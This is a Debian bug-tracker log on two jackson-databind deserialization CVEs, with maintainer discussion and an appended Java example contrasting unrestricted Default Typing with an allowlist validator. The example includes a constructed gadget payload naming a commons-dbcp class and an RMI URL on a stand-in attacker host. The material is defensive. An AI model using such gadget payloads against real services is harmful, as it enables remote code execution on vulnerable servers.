Debian Bug report logs - #941530
jackson-databind: CVE-2019-16942 CVE-2019-16943

Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Tue, 1 Oct 2019 20:39:01 UTC

Severity: grave

Tags: security, upstream

Found in versions jackson-databind/2.10.0-1, jackson-databind/2.8.6-1+deb9u5, jackson-databind/2.8.6-1, jackson-databind/2.9.8-3

Forwarded to https://github.com/FasterXML/jackson-databind/issues/2478



Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>:
Bug#941530; Package src:jackson-databind. (Tue, 01 Oct 2019 20:39:03 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>. (Tue, 01 Oct 2019 20:39:03 GMT)


Message #5 received at submit@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: jackson-databind: CVE-2019-16942 CVE-2019-16943
Date: Tue, 01 Oct 2019 22:34:33 +0200
Source: jackson-databind
Version: 2.10.0-1
Severity: grave
Tags: security upstream
Justification: user security hole
Forwarded: https://github.com/FasterXML/jackson-databind/issues/2478
Control: found -1 2.9.8-3
Control: found -1 2.8.6-1+deb9u5
Control: found -1 2.8.6-1

Hi,

Tony, Markus, as it was already expected ;-). Upstream, whilst it
affects 2.10.0 as well, seemingly is not considering doing an update
for 2.10 specifically, but has fixed this one for older versions as
well. The previous point, that this is just going to start to be silly,
still holds.

That said, let's follow with the usual information:

The following vulnerabilities were published for jackson-databind.

CVE-2019-16942[0]:
| A Polymorphic Typing issue was discovered in FasterXML jackson-
| databind 2.0.0 through 2.9.10. When Default Typing is enabled (either
| globally or for a specific property) for an externally exposed JSON
| endpoint and the service has the commons-dbcp (1.4) jar in the
| classpath, and an attacker can find an RMI service endpoint to access,
| it is possible to make the service execute a malicious payload. This
| issue exists because of
| org.apache.commons.dbcp.datasources.SharedPoolDataSource and
| org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.


CVE-2019-16943[1]:
| A Polymorphic Typing issue was discovered in FasterXML jackson-
| databind 2.0.0 through 2.9.10. When Default Typing is enabled (either
| globally or for a specific property) for an externally exposed JSON
| endpoint and the service has the p6spy (3.8.6) jar in the classpath,
| and an attacker can find an RMI service endpoint to access, it is
| possible to make the service execute a malicious payload. This issue
| exists because of com.p6spy.engine.spy.P6DataSource mishandling.


If you fix the vulnerabilities please also make sure to include the
CVE (Common Vulnerabilities & Exposures) ids in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2019-16942
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16942
[1] https://security-tracker.debian.org/tracker/CVE-2019-16943
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16943
[2] https://github.com/FasterXML/jackson-databind/issues/2478

Regards,
Salvatore



Marked as found in versions jackson-databind/2.9.8-3. Request was from Salvatore Bonaccorso <carnil@debian.org> to submit@bugs.debian.org. (Tue, 01 Oct 2019 20:39:03 GMT)


Marked as found in versions jackson-databind/2.8.6-1+deb9u5. Request was from Salvatore Bonaccorso <carnil@debian.org> to submit@bugs.debian.org. (Tue, 01 Oct 2019 20:39:04 GMT)


Marked as found in versions jackson-databind/2.8.6-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to submit@bugs.debian.org. (Tue, 01 Oct 2019 20:39:05 GMT)


Information forwarded to debian-bugs-dist@lists.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>:
Bug#941530; Package src:jackson-databind. (Tue, 01 Oct 2019 20:57:03 GMT)


Acknowledgement sent to Markus Koschany <apo@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>. (Tue, 01 Oct 2019 20:57:03 GMT)


Message #16 received at 941530@bugs.debian.org:

From: Markus Koschany <apo@debian.org>
To: Salvatore Bonaccorso <carnil@debian.org>
Cc: 941530@bugs.debian.org
Subject: Re: Bug#941530: jackson-databind: CVE-2019-16942 CVE-2019-16943
Date: Tue, 1 Oct 2019 22:46:16 +0200
Hi Salvatore,

Am 01.10.19 um 22:34 schrieb Salvatore Bonaccorso:
> Source: jackson-databind
> Version: 2.10.0-1
> Severity: grave
> Tags: security upstream
> Justification: user security hole
> Forwarded: https://github.com/FasterXML/jackson-databind/issues/2478
> Control: found -1 2.9.8-3
> Control: found -1 2.8.6-1+deb9u5
> Control: found -1 2.8.6-1
> 
> Hi,
> 
> Tony, Markus, as it was already expected ;-). Upstream, whilst it
> affects 2.10.0 as well, seemingly is not considering doing an update
> for 2.10 specifically, but has fixed this one for older versions as
> well. The previous point, that this is just going to start to be silly,
> still holds.
> 
> That said, let's follow with the usual information:
> 
> The following vulnerabilities were published for jackson-databind.
[...]

First of all, thank you very much for taking care of reporting these issues.

Please let me know if you think this is a DSA-worthy issue. Otherwise I
will just ask the release team for an update. Personally I believe we
can treat that as an important issue from now on.

Cheers,

Markus




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>:
Bug#941530; Package src:jackson-databind. (Wed, 02 Oct 2019 07:45:04 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>. (Wed, 02 Oct 2019 07:45:04 GMT)


Message #21 received at 941530@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: Markus Koschany <apo@debian.org>
Cc: 941530@bugs.debian.org, Debian Security Team <team@security.debian.org>
Subject: Re: Bug#941530: jackson-databind: CVE-2019-16942 CVE-2019-16943
Date: Wed, 2 Oct 2019 09:43:20 +0200
Hi Markus,

On Tue, Oct 01, 2019 at 10:46:16PM +0200, Markus Koschany wrote:
> Hi Salvatore,
> 
> Am 01.10.19 um 22:34 schrieb Salvatore Bonaccorso:
> > Source: jackson-databind
> > Version: 2.10.0-1
> > Severity: grave
> > Tags: security upstream
> > Justification: user security hole
> > Forwarded: https://github.com/FasterXML/jackson-databind/issues/2478
> > Control: found -1 2.9.8-3
> > Control: found -1 2.8.6-1+deb9u5
> > Control: found -1 2.8.6-1
> > 
> > Hi,
> > 
> > Tony, Markus, as it was already expected ;-). Upstream, whilst it
> > affects 2.10.0 as well, seemingly is not considering doing an update
> > for 2.10 specifically, but has fixed this one for older versions as
> > well. The previous point, that this is just going to start to be silly,
> > still holds.
> > 
> > That said, let's follow with the usual information:
> > 
> > The following vulnerabilities were published for jackson-databind.
> [...]
> 
> First of all, thank you very much for taking care of reporting these issues.
> 
> Please let me know if you think this is a DSA-worthy issue. Otherwise I
> will just ask the release team for an update. Personally I believe we
> can treat that as an important issue from now on.

Whilst I'm not yet sure if we should really release a further DSA for
jackson-databind (we will come back to you on that), a possible idea
for bullseye (might be better cloned/filed as a new bug, but I want to
mention it here already):

https://bugzilla.redhat.com/show_bug.cgi?id=1731271

Red Hat recently fixed a CVE for codehaus. The approach they took
there was, rather than continuing on the jackson-databind side (that is
my interpretation), to start a whitelist approach on the side of the
applications which use jackson-databind.

This might be something to consider for bullseye as well for the
reverse dependencies. Not sure if this is feasible in our case, but
this might be worth investigating.

Regards,
Salvatore
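
The two CVE descriptions in Message #5 (Default Typing enabled on an exposed endpoint plus a gadget class such as SharedPoolDataSource, PerUserPoolDataSource or P6DataSource on the classpath) and the whitelist approach Salvatore points to in Message #21 both come down to how the application's ObjectMapper is configured. As an added example, not code from this bug report, from Debian or from the jackson-databind project, the following Java shows the unrestricted Default Typing configuration beside the allowlist form available from jackson-databind 2.10 (the activateDefaultTyping / BasicPolymorphicTypeValidator API). The class name DefaultTypingDemo, the com.example.model package prefix and the payload's property names are assumptions for illustration; the gadget class names are the ones quoted in the CVE text.

```java
// Added example, not code from the bug report or from jackson-databind itself.
// Requires jackson-databind 2.10.x on the classpath (activateDefaultTyping and
// BasicPolymorphicTypeValidator do not exist in 2.9).
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DefaultTypingDemo {

    // Vulnerable pattern: any class on the classpath may be named in the JSON
    // type id. enableDefaultTyping() is deprecated in 2.10 but still present; on
    // 2.9 it is the documented way to turn Default Typing on.
    @SuppressWarnings("deprecation")
    static ObjectMapper unrestrictedMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    // Allowlist pattern: only subtypes under the assumed application package
    // com.example.model may be resolved from a type id. Anything else, gadget
    // classes included, is denied regardless of what the classpath contains.
    static ObjectMapper allowlistedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")
                .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    // Constructed attacker-style payload in the WRAPPER_ARRAY form Default Typing
    // uses: [ "<class name>", { ...properties... } ]. The type id names one of the
    // commons-dbcp classes from CVE-2019-16942; the property name and the RMI URL
    // are placeholders, not a working exploit.
    static final String GADGET_PAYLOAD =
          "[\"org.apache.commons.dbcp.datasources.SharedPoolDataSource\","
        + " {\"dataSourceName\": \"rmi://attacker.example/obj\"}]";

    // Describes what happens at the type-id stage for a given mapper.
    static String typeIdOutcome(ObjectMapper mapper) {
        try {
            Object value = mapper.readValue(GADGET_PAYLOAD, Object.class);
            // Reaching here means the named class was loaded and constructed.
            return "instantiated " + value.getClass().getName();
        } catch (InvalidTypeIdException e) {
            // Thrown when the type id is denied by the validator, or when the
            // class cannot be resolved at all (jar absent).
            return "type id rejected: " + e.getTypeId();
        } catch (Exception e) {
            return "failed after type resolution: " + e.getClass().getName();
        }
    }

    public static void main(String[] args) {
        System.out.println("allowlisted: " + typeIdOutcome(allowlistedMapper()));
        System.out.println("unrestricted: " + typeIdOutcome(unrestrictedMapper()));
    }
}
```

With commons-dbcp absent from the classpath both mappers report the type id as rejected, so the difference only shows when the gadget jar is present: the allowlisted mapper still throws InvalidTypeIdException because the class is outside com.example.model, while the unrestricted mapper, on a jackson-databind release without the fix from issue 2478, goes on to construct the named class. The same allowlist can be declared per property with @JsonTypeInfo instead of globally; the point of the Red Hat approach mentioned above is that the admissible subtypes are named by the application rather than discovered from the classpath, which is why it does not need a new jackson-databind release per gadget.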





Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Oct 2 16:46:34 2019; Machine Name: buxtehude
